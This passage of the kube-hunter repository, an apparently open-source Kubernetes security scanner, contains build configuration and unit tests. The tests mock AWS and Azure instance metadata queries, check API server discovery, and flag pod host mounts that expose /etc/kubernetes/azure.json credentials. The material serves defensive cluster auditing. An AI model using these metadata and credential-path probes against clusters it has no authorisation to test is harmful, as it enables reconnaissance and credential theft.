18 | # default registration of builtin implemented plugins
19 | from kube_hunter.conf import parser
20 |
21 | pm.register(parser)
22 |
23 | return pm
24 |
--------------------------------------------------------------------------------
/kube_hunter/plugins/hookspecs.py:
--------------------------------------------------------------------------------
1 | import pluggy
2 | from argparse import ArgumentParser
3 |
4 | hookspec = pluggy.HookspecMarker("kube-hunter")
5 |
6 |
7 | @hookspec
8 | def parser_add_arguments(parser: ArgumentParser):
9 | """Add arguments to the ArgumentParser.
10 |
11 | If a plugin requires an aditional argument, it should implement this hook
12 | and add the argument to the Argument Parser
13 |
14 | @param parser: an ArgumentParser, calls parser.add_argument on it
15 | """
16 |
17 |
18 | @hookspec
19 | def load_plugin(args):
20 | """Plugins that wish to execute code after the argument parsing
21 | should implement this hook.
22 |
23 | @param args: all parsed arguments passed to kube-hunter
24 | """
25 |
--------------------------------------------------------------------------------
/mypy.ini:
--------------------------------------------------------------------------------
1 | [mypy]
2 | ignore_missing_imports = True
--------------------------------------------------------------------------------
/pyinstaller_hooks/hook-prettytable.py:
--------------------------------------------------------------------------------
1 | from PyInstaller.utils.hooks import collect_all
2 |
3 | datas, binaries, hiddenimports = collect_all("prettytable")
4 |
--------------------------------------------------------------------------------
/pyproject.toml:
--------------------------------------------------------------------------------
1 | [tool.black]
2 | line-length = 120
3 | target-version = ['py36']
4 | include = '\.pyi?$'
5 | exclude = '''
6 | (
7 | \.eggs
8 | | \.git
9 | | \.hg
10 | | \.mypy_cache
11 | | \.tox
12 | | \venv
13 | | \.venv
14 | | _build
15 | | buck-out
16 | | build
17 | | dist
18 | | \.vscode
19 | | \.idea
20 | | \.Python
21 | | develop-eggs
22 | | downloads
23 | | eggs
24 | | lib
25 | | lib64
26 | | parts
27 | | sdist
28 | | var
29 | | .*\.egg-info
30 | | \.DS_Store
31 | )
32 | '''
33 |
--------------------------------------------------------------------------------
/requirements-dev.txt:
--------------------------------------------------------------------------------
1 | flake8
2 | pytest >= 2.9.1
3 | requests-mock >= 1.8
4 | coverage < 5.0
5 | pytest-cov
6 | setuptools >= 30.3.0
7 | setuptools_scm
8 | twine
9 | pyinstaller
10 | staticx
11 | black
12 | pre-commit
13 | flake8-bugbear
14 | flake8-mypy
15 | pluggy
16 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | -e .
2 |
--------------------------------------------------------------------------------
/setup.cfg:
--------------------------------------------------------------------------------
1 | [metadata]
2 | name = kube-hunter
3 | description = Kubernetes security weaknesses hunter for humans
4 | long_description = file: README.md
5 | long_description_content_type = text/markdown
6 | author = Aqua Security
7 | author_email = support@aquasec.com
8 | url = https://github.com/aquasecurity/kube-hunter
9 | keywords =
10 | aquasec
11 | hunter
12 | kubernetes
13 | k8s
14 | security
15 | license_file = LICENSE
16 | classifiers =
17 | Development Status :: 4 - Beta
18 | Environment :: Console
19 | License :: OSI Approved :: Apache Software License
20 | Natural Language :: English
21 | Operating System :: OS Independent
22 | Programming Language :: Python :: 3.6
23 | Programming Language :: Python :: 3.7
24 | Programming Language :: Python :: 3.8
25 | Programming Language :: Python :: 3.9
26 | Programming Language :: Python :: 3 :: Only
27 | Topic :: Security
28 |
29 | [options]
30 | zip_safe = False
31 | packages = find:
32 | install_requires =
33 | netaddr
34 | pyroute2
35 | requests
36 | PrettyTable
37 | urllib3>=1.24.3
38 | ruamel.yaml
39 | future
40 | packaging
41 | dataclasses
42 | pluggy
43 | kubernetes==12.0.1
44 | setup_requires =
45 | setuptools>=30.3.0
46 | setuptools_scm
47 | test_requires =
48 | pytest>=2.9.1
49 | coverage<5.0
50 | pytest-cov
51 | requests-mock
52 | python_requires = >=3.6
53 |
54 | [options.entry_points]
55 | console_scripts =
56 | kube-hunter = kube_hunter.__main__:main
57 |
58 | [aliases]
59 | test=pytest
60 |
61 | # PyTest
62 | [tool:pytest]
63 | minversion = 2.9.1
64 | norecursedirs = .venv .vscode
65 | addopts = --cov=kube_hunter
66 | testpaths = tests
67 | console_output_style = progress
68 | python_classes = Test*
69 | python_files = test_*.py
70 | python_functions = test_*
71 | filterwarnings = ignore::DeprecationWarning
72 |
73 | # Coverage
74 | [coverage:report]
75 | # show missing lines numbers
76 | show_missing = True
77 | # Regexes for lines to exclude from consideration
78 | exclude_lines =
79 | # Have to re-enable the standard pragma
80 | pragma: no cover
81 | # Don't complain about missing debug-only code:
82 | def __repr__
83 | if self\.debug
84 | # Don't complain if tests don't hit defensive
85 | # assertion code:
86 | raise AssertionError
87 | raise NotImplementedError
88 | # Don't complain if non-runnable code isn't run:
89 | if 0:
90 | if __name__ == .__main__.:
91 | # Don't complain about log messages not being tested
92 | logger\.
93 | logging\.
94 |
95 | # Files to exclude from consideration
96 | omit =
97 | kube_hunter/__main__.py
98 |
--------------------------------------------------------------------------------
/setup.py:
--------------------------------------------------------------------------------
1 | from configparser import ConfigParser
2 | from pkg_resources import parse_requirements
3 | from subprocess import check_call
4 | from typing import Any, List
5 | from setuptools import setup, Command
6 |
7 |
8 | class ListDependenciesCommand(Command):
9 | """A custom command to list dependencies"""
10 |
11 | description = "list package dependencies"
12 | user_options: List[Any] = []
13 |
14 | def initialize_options(self):
15 | pass
16 |
17 | def finalize_options(self):
18 | pass
19 |
20 | def run(self):
21 | cfg = ConfigParser()
22 | cfg.read("setup.cfg")
23 | requirements = cfg["options"]["install_requires"]
24 | print(requirements)
25 |
26 |
27 | class PyInstallerCommand(Command):
28 | """A custom command to run PyInstaller to build standalone executable."""
29 |
30 | description = "run PyInstaller on kube-hunter entrypoint"
31 | user_options: List[Any] = []
32 |
33 | def initialize_options(self):
34 | pass
35 |
36 | def finalize_options(self):
37 | pass
38 |
39 | def run(self):
40 | cfg = ConfigParser()
41 | cfg.read("setup.cfg")
42 | command = [
43 | "pyinstaller",
44 | "--additional-hooks-dir",
45 | "pyinstaller_hooks",
46 | "--clean",
47 | "--onefile",
48 | "--name",
49 | "kube-hunter",
50 | ]
51 | setup_cfg = cfg["options"]["install_requires"]
52 | requirements = parse_requirements(setup_cfg)
53 | for r in requirements:
54 | command.extend(["--hidden-import", r.key])
55 | command.append("kube_hunter/__main__.py")
56 | print(" ".join(command))
57 | check_call(command)
58 |
59 |
60 | setup(
61 | use_scm_version={"fallback_version": "noversion"},
62 | cmdclass={"dependencies": ListDependenciesCommand, "pyinstaller": PyInstallerCommand},
63 | )
64 |
--------------------------------------------------------------------------------
/tests/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/aquasecurity/kube-hunter/bc47f08e88ea2a5fb059bf3b8a8edb1aefb4c6cc/tests/__init__.py
--------------------------------------------------------------------------------
/tests/conf/test_logging.py:
--------------------------------------------------------------------------------
1 | import logging
2 |
3 | from kube_hunter.conf.logging import setup_logger
4 |
5 |
6 | def test_setup_logger_level():
7 | test_cases = [
8 | ("INFO", logging.INFO),
9 | ("Debug", logging.DEBUG),
10 | ("critical", logging.CRITICAL),
11 | ("NOTEXISTS", logging.INFO),
12 | ("BASIC_FORMAT", logging.INFO),
13 | ]
14 | logFile = None
15 | for level, expected in test_cases:
16 | setup_logger(level, logFile)
17 | actual = logging.getLogger().getEffectiveLevel()
18 | assert actual == expected, f"{level} level should be {expected} (got {actual})"
19 |
20 |
21 | def test_setup_logger_none():
22 | setup_logger("NONE", None)
23 | assert logging.getLogger().manager.disable == logging.CRITICAL
24 |
--------------------------------------------------------------------------------
/tests/core/test_cloud.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | import requests_mock
3 | import json
4 |
5 | from kube_hunter.conf import Config, set_config
6 |
7 | set_config(Config())
8 |
9 | from kube_hunter.core.events.types import NewHostEvent
10 |
11 |
12 | def test_presetcloud():
13 | """Testing if it doesn't try to run get_cloud if the cloud type is already set.
14 | get_cloud(1.2.3.4) will result with an error
15 | """
16 | expcted = "AWS"
17 | hostEvent = NewHostEvent(host="1.2.3.4", cloud=expcted)
18 | assert expcted == hostEvent.cloud
19 |
20 |
21 | def test_getcloud():
22 | fake_host = "1.2.3.4"
23 | expected_cloud = "Azure"
24 | result = {"cloud": expected_cloud}
25 |
26 | with requests_mock.mock() as m:
27 | m.get(f"https://api.azurespeed.com/api/region?ipOrUrl={fake_host}", text=json.dumps(result))
28 | hostEvent = NewHostEvent(host=fake_host)
29 | assert hostEvent.cloud == expected_cloud
30 |
--------------------------------------------------------------------------------
/tests/core/test_handler.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 |
3 | from kube_hunter.conf import Config, set_config, get_config
4 |
5 | set_config(Config(active=True))
6 |
7 | from kube_hunter.core.events.event_handler import handler
8 | from kube_hunter.modules.discovery.apiserver import ApiServiceDiscovery
9 | from kube_hunter.modules.discovery.dashboard import KubeDashboard as KubeDashboardDiscovery
10 | from kube_hunter.modules.discovery.etcd import EtcdRemoteAccess as EtcdRemoteAccessDiscovery
11 | from kube_hunter.modules.discovery.hosts import FromPodHostDiscovery, HostDiscovery
12 | from kube_hunter.modules.discovery.kubectl import KubectlClientDiscovery
13 | from kube_hunter.modules.discovery.kubelet import KubeletDiscovery
14 | from kube_hunter.modules.discovery.ports import PortDiscovery
15 | from kube_hunter.modules.discovery.proxy import KubeProxy as KubeProxyDiscovery
16 | from kube_hunter.modules.hunting.aks import AzureSpnHunter, ProveAzureSpnExposure
17 | from kube_hunter.modules.hunting.apiserver import (
18 | AccessApiServer,
19 | ApiVersionHunter,
20 | AccessApiServerActive,
21 | AccessApiServerWithToken,
22 | )
23 | from kube_hunter.modules.hunting.capabilities import PodCapabilitiesHunter
24 | from kube_hunter.modules.hunting.certificates import CertificateDiscovery
25 |
26 | from kube_hunter.modules.hunting.cves import K8sClusterCveHunter
27 | from kube_hunter.modules.hunting.cves import KubectlCVEHunter
28 | from kube_hunter.modules.hunting.dashboard import KubeDashboard
29 | from kube_hunter.modules.hunting.etcd import EtcdRemoteAccess, EtcdRemoteAccessActive
30 | from kube_hunter.modules.hunting.kubelet import (
31 | ProveAnonymousAuth,
32 | MaliciousIntentViaSecureKubeletPort,
33 | ProveContainerLogsHandler,
34 | ProveRunHandler,
35 | ProveSystemLogs,
36 | ReadOnlyKubeletPortHunter,
37 | SecureKubeletPortHunter,
38 | )
39 | from kube_hunter.modules.hunting.mounts import VarLogMountHunter, ProveVarLogMount
40 | from kube_hunter.modules.hunting.proxy import KubeProxy, ProveProxyExposed, K8sVersionDisclosureProve
41 | from kube_hunter.modules.hunting.secrets import AccessSecrets
42 |
43 | config = get_config()
44 |
45 | PASSIVE_HUNTERS = {
46 | ApiServiceDiscovery,
47 | KubeDashboardDiscovery,
48 | EtcdRemoteAccessDiscovery,
49 | FromPodHostDiscovery,
50 | HostDiscovery,
51 | KubectlClientDiscovery,
52 | KubeletDiscovery,
53 | PortDiscovery,
54 | KubeProxyDiscovery,
55 | AzureSpnHunter,
56 | AccessApiServer,
57 | AccessApiServerWithToken,
58 | ApiVersionHunter,
59 | PodCapabilitiesHunter,
60 | CertificateDiscovery,
61 | KubectlCVEHunter,
62 | KubeDashboard,
63 | EtcdRemoteAccess,
64 | ReadOnlyKubeletPortHunter,
65 | SecureKubeletPortHunter,
66 | VarLogMountHunter,
67 | KubeProxy,
68 | AccessSecrets,
69 | }
70 |
71 | # if config.enable_cve_hunting:
72 | # PASSIVE_HUNTERS.append(K8sClusterCveHunter)
73 |
74 | ACTIVE_HUNTERS = {
75 | ProveAzureSpnExposure,
76 | AccessApiServerActive,
77 | EtcdRemoteAccessActive,
78 | ProveRunHandler,
79 | ProveContainerLogsHandler,
80 | ProveSystemLogs,
81 | ProveVarLogMount,
82 | ProveProxyExposed,
83 | K8sVersionDisclosureProve,
84 | ProveAnonymousAuth,
85 | MaliciousIntentViaSecureKubeletPort,
86 | }
87 |
88 |
89 | def remove_test_hunters(hunters):
90 | return {hunter for hunter in hunters if not hunter.__module__.startswith("test")}
91 |
92 |
93 | def test_passive_hunters_registered():
94 | expected_missing = set()
95 | expected_odd = set()
96 |
97 | registered_passive = remove_test_hunters(handler.passive_hunters.keys())
98 | actual_missing = PASSIVE_HUNTERS - registered_passive
99 | actual_odd = registered_passive - PASSIVE_HUNTERS
100 |
101 | assert expected_missing == actual_missing, "Passive hunters are missing"
102 | assert expected_odd == actual_odd, "Unexpected passive hunters are registered"
103 |
104 |
105 | def test_active_hunters_registered():
106 | expected_missing = set()
107 | expected_odd = set()
108 |
109 | registered_active = remove_test_hunters(handler.active_hunters.keys())
110 | actual_missing = ACTIVE_HUNTERS - registered_active
111 | actual_odd = registered_active - ACTIVE_HUNTERS
112 |
113 | assert expected_missing == actual_missing, "Active hunters are missing"
114 | assert expected_odd == actual_odd, "Unexpected active hunters are registered"
115 |
116 |
117 | def test_all_hunters_registered():
118 | expected = PASSIVE_HUNTERS | ACTIVE_HUNTERS
119 | actual = remove_test_hunters(handler.all_hunters.keys())
120 |
121 | assert expected == actual
122 |
--------------------------------------------------------------------------------
/tests/core/test_subscribe.py:
--------------------------------------------------------------------------------
1 | import time
2 |
3 | from kube_hunter.conf import Config, set_config
4 | from kube_hunter.core.types import Hunter
5 | from kube_hunter.core.events.types import Event, Service
6 | from kube_hunter.core.events.event_handler import handler
7 |
8 | counter = 0
9 | first_run = True
10 |
11 | set_config(Config())
12 |
13 |
14 | class OnceOnlyEvent(Service, Event):
15 | def __init__(self):
16 | Service.__init__(self, "Test Once Service")
17 |
18 |
19 | class RegularEvent(Service, Event):
20 | def __init__(self):
21 | Service.__init__(self, "Test Service")
22 |
23 |
24 | class AnotherRegularEvent(Service, Event):
25 | def __init__(self):
26 | Service.__init__(self, "Test Service (another)")
27 |
28 |
29 | class DifferentRegularEvent(Service, Event):
30 | def __init__(self):
31 | Service.__init__(self, "Test Service (different)")
32 |
33 |
34 | @handler.subscribe_once(OnceOnlyEvent)
35 | class OnceHunter(Hunter):
36 | def __init__(self, event):
37 | global counter
38 | counter += 1
39 |
40 |
41 | @handler.subscribe(RegularEvent)
42 | class RegularHunter(Hunter):
43 | def __init__(self, event):
44 | global counter
45 | counter += 1
46 |
47 |
48 | @handler.subscribe_many([DifferentRegularEvent, AnotherRegularEvent])
49 | class SmartHunter(Hunter):
50 | def __init__(self, events):
51 | global counter, first_run
52 | counter += 1
53 |
54 | # we add an attribute on the second scan.
55 | # here we test that we get the latest event
56 | different_event = events.get_by_class(DifferentRegularEvent)
57 | if first_run:
58 | first_run = False
59 | assert not different_event.new_value
60 | else:
61 | assert different_event.new_value
62 |
63 |
64 | @handler.subscribe_many([DifferentRegularEvent, AnotherRegularEvent])
65 | class SmartHunter2(Hunter):
66 | def __init__(self, events):
67 | global counter
68 | counter += 1
69 |
70 | # check if we can access the events
71 | assert events.get_by_class(DifferentRegularEvent).__class__ == DifferentRegularEvent
72 | assert events.get_by_class(AnotherRegularEvent).__class__ == AnotherRegularEvent
73 |
74 |
75 | def test_subscribe_mechanism():
76 | global counter
77 | counter = 0
78 |
79 | # first test normal subscribe and publish works
80 | handler.publish_event(RegularEvent())
81 | handler.publish_event(RegularEvent())
82 | handler.publish_event(RegularEvent())
83 |
84 | time.sleep(0.02)
85 | assert counter == 3
86 |
87 |
88 | def test_subscribe_once_mechanism():
89 | global counter
90 | counter = 0
91 |
92 | # testing the multiple subscription mechanism
93 | handler.publish_event(OnceOnlyEvent())
94 |
95 | time.sleep(0.02)
96 | assert counter == 1
97 | counter = 0
98 |
99 | handler.publish_event(OnceOnlyEvent())
100 | handler.publish_event(OnceOnlyEvent())
101 | handler.publish_event(OnceOnlyEvent())
102 | time.sleep(0.02)
103 |
104 | assert counter == 0
105 |
106 |
107 | def test_subscribe_many_mechanism():
108 | global counter
109 | counter = 0
110 |
111 | # testing the multiple subscription mechanism
112 | handler.publish_event(DifferentRegularEvent())
113 | handler.publish_event(DifferentRegularEvent())
114 | handler.publish_event(DifferentRegularEvent())
115 | handler.publish_event(DifferentRegularEvent())
116 | handler.publish_event(DifferentRegularEvent())
117 | handler.publish_event(AnotherRegularEvent())
118 |
119 | time.sleep(0.02)
120 | # We expect SmartHunter and SmartHunter2 to be executed once. hence the counter should be 2
121 | assert counter == 2
122 | counter = 0
123 |
124 | # Test using most recent event
125 | newer_version_event = DifferentRegularEvent()
126 | newer_version_event.new_value = True
127 | handler.publish_event(newer_version_event)
128 |
129 | assert counter == 2
130 |
--------------------------------------------------------------------------------
/tests/discovery/test_apiserver.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | import requests_mock
3 | import time
4 |
5 | from kube_hunter.conf import Config, set_config
6 |
7 | set_config(Config())
8 |
9 | from kube_hunter.modules.discovery.apiserver import ApiServer, ApiServiceDiscovery
10 | from kube_hunter.core.events.types import Event
11 | from kube_hunter.core.events.event_handler import handler
12 |
13 | counter = 0
14 |
15 |
16 | def test_ApiServer():
17 | global counter
18 | counter = 0
19 | with requests_mock.Mocker() as m:
20 | m.get("https://mockOther:443", text="elephant")
21 | m.get("https://mockKubernetes:443", text='{"code":403}', status_code=403)
22 | m.get(
23 | "https://mockKubernetes:443/version",
24 | text='{"major": "1.14.10"}',
25 | status_code=200,
26 | )
27 |
28 | e = Event()
29 | e.protocol = "https"
30 | e.port = 443
31 | e.host = "mockOther"
32 |
33 | a = ApiServiceDiscovery(e)
34 | a.execute()
35 |
36 | e.host = "mockKubernetes"
37 | a.execute()
38 |
39 | # Allow the events to be processed. Only the one to mockKubernetes should trigger an event
40 | time.sleep(1)
41 | assert counter == 1
42 |
43 |
44 | def test_ApiServerWithServiceAccountToken():
45 | global counter
46 | counter = 0
47 | with requests_mock.Mocker() as m:
48 | m.get(
49 | "https://mockKubernetes:443",
50 | request_headers={"Authorization": "Bearer very_secret"},
51 | text='{"code":200}',
52 | )
53 | m.get("https://mockKubernetes:443", text='{"code":403}', status_code=403)
54 | m.get(
55 | "https://mockKubernetes:443/version",
56 | text='{"major": "1.14.10"}',
57 | status_code=200,
58 | )
59 | m.get("https://mockOther:443", text="elephant")
60 |
61 | e = Event()
62 | e.protocol = "https"
63 | e.port = 443
64 |
65 | # We should discover an API Server regardless of whether we have a token
66 | e.host = "mockKubernetes"
67 | a = ApiServiceDiscovery(e)
68 | a.execute()
69 | time.sleep(0.1)
70 | assert counter == 1
71 |
72 | e.auth_token = "very_secret"
73 | a = ApiServiceDiscovery(e)
74 | a.execute()
75 | time.sleep(0.1)
76 | assert counter == 2
77 |
78 | # But we shouldn't generate an event if we don't see an error code or find the 'major' in /version
79 | e.host = "mockOther"
80 | a = ApiServiceDiscovery(e)
81 | a.execute()
82 | time.sleep(0.1)
83 | assert counter == 2
84 |
85 |
86 | def test_InsecureApiServer():
87 | global counter
88 | counter = 0
89 | with requests_mock.Mocker() as m:
90 | m.get("http://mockOther:8080", text="elephant")
91 | m.get(
92 | "http://mockKubernetes:8080",
93 | text="""{
94 | "paths": [
95 | "/api",
96 | "/api/v1",
97 | "/apis",
98 | "/apis/",
99 | "/apis/admissionregistration.k8s.io",
100 | "/apis/admissionregistration.k8s.io/v1beta1",
101 | "/apis/apiextensions.k8s.io"
102 | ]}""",
103 | )
104 |
105 | m.get("http://mockKubernetes:8080/version", text='{"major": "1.14.10"}')
106 | m.get("http://mockOther:8080/version", status_code=404)
107 |
108 | e = Event()
109 | e.protocol = "http"
110 | e.port = 8080
111 | e.host = "mockOther"
112 |
113 | a = ApiServiceDiscovery(e)
114 | a.execute()
115 |
116 | e.host = "mockKubernetes"
117 | a.execute()
118 |
119 | # Allow the events to be processed. Only the one to mockKubernetes should trigger an event
120 | time.sleep(0.1)
121 | assert counter == 1
122 |
123 |
124 | # We should only generate an ApiServer event for a response that looks like it came from a Kubernetes node
125 | @handler.subscribe(ApiServer)
126 | class testApiServer:
127 | def __init__(self, event):
128 | print("Event")
129 | assert event.host == "mockKubernetes"
130 | global counter
131 | counter += 1
132 |
--------------------------------------------------------------------------------
/tests/discovery/test_hosts.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from kube_hunter.modules.discovery.hosts import (
3 | FromPodHostDiscovery,
4 | RunningAsPodEvent,
5 | HostScanEvent,
6 | HostDiscoveryHelpers,
7 | )
8 | from kube_hunter.core.types import Hunter
9 | from kube_hunter.core.events.event_handler import handler
10 | import json
11 | import requests_mock
12 | import pytest
13 |
14 | from netaddr import IPNetwork, IPAddress
15 | from typing import List
16 | from kube_hunter.conf import Config, get_config, set_config
17 |
18 | set_config(Config())
19 |
20 |
21 | class TestFromPodHostDiscovery:
22 | @staticmethod
23 | def _make_azure_response(*subnets: List[tuple]) -> str:
24 | return json.dumps(
25 | {
26 | "network": {
27 | "interface": [
28 | {"ipv4": {"subnet": [{"address": address, "prefix": prefix} for address, prefix in subnets]}}
29 | ]
30 | }
31 | }
32 | )
33 |
34 | @staticmethod
35 | def _make_aws_response(*data: List[str]) -> str:
36 | return "\n".join(data)
37 |
38 | def test_is_azure_pod_request_fail(self):
39 | f = FromPodHostDiscovery(RunningAsPodEvent())
40 |
41 | with requests_mock.Mocker() as m:
42 | m.get("http://169.254.169.254/metadata/instance?api-version=2017-08-01", status_code=404)
43 | result = f.is_azure_pod()
44 |
45 | assert not result
46 |
47 | def test_is_azure_pod_success(self):
48 | f = FromPodHostDiscovery(RunningAsPodEvent())
49 |
50 | with requests_mock.Mocker() as m:
51 | m.get(
52 | "http://169.254.169.254/metadata/instance?api-version=2017-08-01",
53 | text=TestFromPodHostDiscovery._make_azure_response(("3.4.5.6", "255.255.255.252")),
54 | )
55 | result = f.is_azure_pod()
56 |
57 | assert result
58 |
59 | def test_is_aws_pod_v1_request_fail(self):
60 | f = FromPodHostDiscovery(RunningAsPodEvent())
61 |
62 | with requests_mock.Mocker() as m:
63 | m.get("http://169.254.169.254/latest/meta-data/", status_code=404)
64 | result = f.is_aws_pod_v1()
65 |
66 | assert not result
67 |
68 | def test_is_aws_pod_v1_success(self):
69 | f = FromPodHostDiscovery(RunningAsPodEvent())
70 |
71 | with requests_mock.Mocker() as m:
72 | m.get(
73 | "http://169.254.169.254/latest/meta-data/",
74 | text=TestFromPodHostDiscovery._make_aws_response(
75 | "\n".join(
76 | (
77 | "ami-id",
78 | "ami-launch-index",
79 | "ami-manifest-path",
80 | "block-device-mapping/",
81 | "events/",
82 | "hostname",
83 | "iam/",
84 | "instance-action",
85 | "instance-id",
86 | "instance-type",
87 | "local-hostname",
88 | "local-ipv4",
89 | "mac",
90 | "metrics/",
91 | "network/",
92 | "placement/",
93 | "profile",
94 | "public-hostname",
95 | "public-ipv4",
96 | "public-keys/",
97 | "reservation-id",
98 | "security-groups",
99 | "services/",
100 | )
101 | ),
102 | ),
103 | )
104 | result = f.is_aws_pod_v1()
105 |
106 | assert result
107 |
108 | def test_is_aws_pod_v2_request_fail(self):
109 | f = FromPodHostDiscovery(RunningAsPodEvent())
110 |
111 | with requests_mock.Mocker() as m:
112 | m.put(
113 | "http://169.254.169.254/latest/api/token/",
114 | headers={"X-aws-ec2-metatadata-token-ttl-seconds": "21600"},
115 | status_code=404,
116 | )
117 | m.get(
118 | "http://169.254.169.254/latest/meta-data/",
119 | headers={"X-aws-ec2-metatadata-token": "token"},
120 | status_code=404,
121 | )
122 | result = f.is_aws_pod_v2()
123 |
124 | assert not result
125 |
126 | def test_is_aws_pod_v2_success(self):
127 | f = FromPodHostDiscovery(RunningAsPodEvent())
128 |
129 | with requests_mock.Mocker() as m:
130 | m.put(
131 | "http://169.254.169.254/latest/api/token/",
132 | headers={"X-aws-ec2-metatadata-token-ttl-seconds": "21600"},
133 | text=TestFromPodHostDiscovery._make_aws_response("token"),
134 | )
135 | m.get(
136 | "http://169.254.169.254/latest/meta-data/",
137 | headers={"X-aws-ec2-metatadata-token": "token"},
138 | text=TestFromPodHostDiscovery._make_aws_response(
139 | "\n".join(
140 | (
141 | "ami-id",
142 | "ami-launch-index",
143 | "ami-manifest-path",
144 | "block-device-mapping/",
145 | "events/",
146 | "hostname",
147 | "iam/",
148 | "instance-action",
149 | "instance-id",
150 | "instance-type",
151 | "local-hostname",
152 | "local-ipv4",
153 | "mac",
154 | "metrics/",
155 | "network/",
156 | "placement/",
157 | "profile",
158 | "public-hostname",
159 | "public-ipv4",
160 | "public-keys/",
161 | "reservation-id",
162 | "security-groups",
163 | "services/",
164 | )
165 | ),
166 | ),
167 | )
168 | result = f.is_aws_pod_v2()
169 |
170 | assert result
171 |
172 | def test_execute_scan_cidr(self):
173 | set_config(Config(cidr="1.2.3.4/30"))
174 | f = FromPodHostDiscovery(RunningAsPodEvent())
175 | f.execute()
176 |
177 | def test_execute_scan_remote(self):
178 | set_config(Config(remote="1.2.3.4"))
179 | f = FromPodHostDiscovery(RunningAsPodEvent())
180 | f.execute()
181 |
182 |
183 | @handler.subscribe(HostScanEvent)
184 | class HunterTestHostDiscovery(Hunter):
185 | """TestHostDiscovery
186 | In this set of tests we should only trigger HostScanEvent when remote or cidr are set
187 | """
188 |
189 | def __init__(self, event):
190 | config = get_config()
191 | assert config.remote is not None or config.cidr is not None
192 | assert config.remote == "1.2.3.4" or config.cidr == "1.2.3.4/30"
193 |
194 |
195 | class TestDiscoveryUtils:
196 | @staticmethod
197 | def test_generate_hosts_valid_cidr():
198 | test_cidr = "192.168.0.0/24"
199 | expected = set(IPNetwork(test_cidr))
200 |
201 | actual = set(HostDiscoveryHelpers.generate_hosts([test_cidr]))
202 |
203 | assert actual == expected
204 |
205 | @staticmethod
206 | def test_generate_hosts_valid_ignore():
207 | remove = IPAddress("192.168.1.8")
208 | scan = "192.168.1.0/24"
209 | expected = {ip for ip in IPNetwork(scan) if ip != remove}
210 |
211 | actual = set(HostDiscoveryHelpers.generate_hosts([scan, f"!{str(remove)}"]))
212 |
213 | assert actual == expected
214 |
215 | @staticmethod
216 | def test_generate_hosts_invalid_cidr():
217 | with pytest.raises(ValueError):
218 | list(HostDiscoveryHelpers.generate_hosts(["192..2.3/24"]))
219 |
220 | @staticmethod
221 | def test_generate_hosts_invalid_ignore():
222 | with pytest.raises(ValueError):
223 | list(HostDiscoveryHelpers.generate_hosts(["192.168.1.8", "!29.2..1/24"]))
224 |
--------------------------------------------------------------------------------
/tests/discovery/test_k8s.py:
--------------------------------------------------------------------------------
1 | from kube_hunter.conf import Config, set_config
2 |
3 | from kube_hunter.modules.discovery.kubernetes_client import list_all_k8s_cluster_nodes
4 | from unittest.mock import MagicMock, patch
5 |
6 | set_config(Config())
7 |
8 |
9 | def test_client_yields_ips():
10 | client = MagicMock()
11 | response = MagicMock()
12 | client.list_node.return_value = response
13 | response.items = [MagicMock(), MagicMock()]
14 | response.items[0].status.addresses = [MagicMock(), MagicMock()]
15 | response.items[0].status.addresses[0].address = "127.0.0.1"
16 | response.items[0].status.addresses[1].address = "127.0.0.2"
17 | response.items[1].status.addresses = [MagicMock()]
18 | response.items[1].status.addresses[0].address = "127.0.0.3"
19 |
20 | with patch("kubernetes.config.load_incluster_config") as m:
21 | output = list(list_all_k8s_cluster_nodes(client=client))
22 | m.assert_called_once()
23 |
24 | assert output == ["127.0.0.1", "127.0.0.2", "127.0.0.3"]
25 |
26 |
27 | def test_client_uses_kubeconfig():
28 | with patch("kubernetes.config.load_kube_config") as m:
29 | list(list_all_k8s_cluster_nodes(kube_config="/location", client=MagicMock()))
30 | m.assert_called_once_with(config_file="/location")
31 |
--------------------------------------------------------------------------------
/tests/hunting/test_aks.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | import requests_mock
3 |
4 | from kube_hunter.conf import Config, set_config
5 |
6 | import json
7 |
8 | set_config(Config())
9 |
10 | from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler
11 | from kube_hunter.modules.hunting.aks import AzureSpnHunter
12 |
13 |
14 | def test_AzureSpnHunter():
15 | e = ExposedPodsHandler(pods=[])
16 | pod_template = '{{"items":[ {{"apiVersion":"v1","kind":"Pod","metadata":{{"name":"etc","namespace":"default"}},"spec":{{"containers":[{{"command":["sleep","99999"],"image":"ubuntu","name":"test","volumeMounts":[{{"mountPath":"/mp","name":"v"}}]}}],"volumes":[{{"hostPath":{{"path":"{}"}},"name":"v"}}]}}}} ]}}'
17 |
18 | bad_paths = ["/", "/etc", "/etc/", "/etc/kubernetes", "/etc/kubernetes/azure.json"]
19 | good_paths = ["/yo", "/etc/yo", "/etc/kubernetes/yo.json"]
20 |
21 | for p in bad_paths:
22 | e.pods = json.loads(pod_template.format(p))["items"]
23 | h = AzureSpnHunter(e)
24 | c = h.get_key_container()
25 | assert c
26 |
27 | for p in good_paths:
28 | e.pods = json.loads(pod_template.format(p))["items"]
29 | h = AzureSpnHunter(e)
30 | c = h.get_key_container()
31 | assert c == None
32 |
33 | pod_no_volume_mounts = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test"}],"volumes":[{"hostPath":{"path":"/whatever"},"name":"v"}]}} ]}'
34 | e.pods = json.loads(pod_no_volume_mounts)["items"]
35 | h = AzureSpnHunter(e)
36 | c = h.get_key_container()
37 | assert c == None
38 |
39 | pod_no_volumes = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test"}]}} ]}'
40 | e.pods = json.loads(pod_no_volumes)["items"]
41 | h = AzureSpnHunter(e)
42 | c = h.get_key_container()
43 | assert c == None
44 |
45 | pod_other_volume = '{"items":[ {"apiVersion":"v1","kind":"Pod","metadata":{"name":"etc","namespace":"default"},"spec":{"containers":[{"command":["sleep","99999"],"image":"ubuntu","name":"test","volumeMounts":[{"mountPath":"/mp","name":"v"}]}],"volumes":[{"emptyDir":{},"name":"v"}]}} ]}'
46 | e.pods = json.loads(pod_other_volume)["items"]
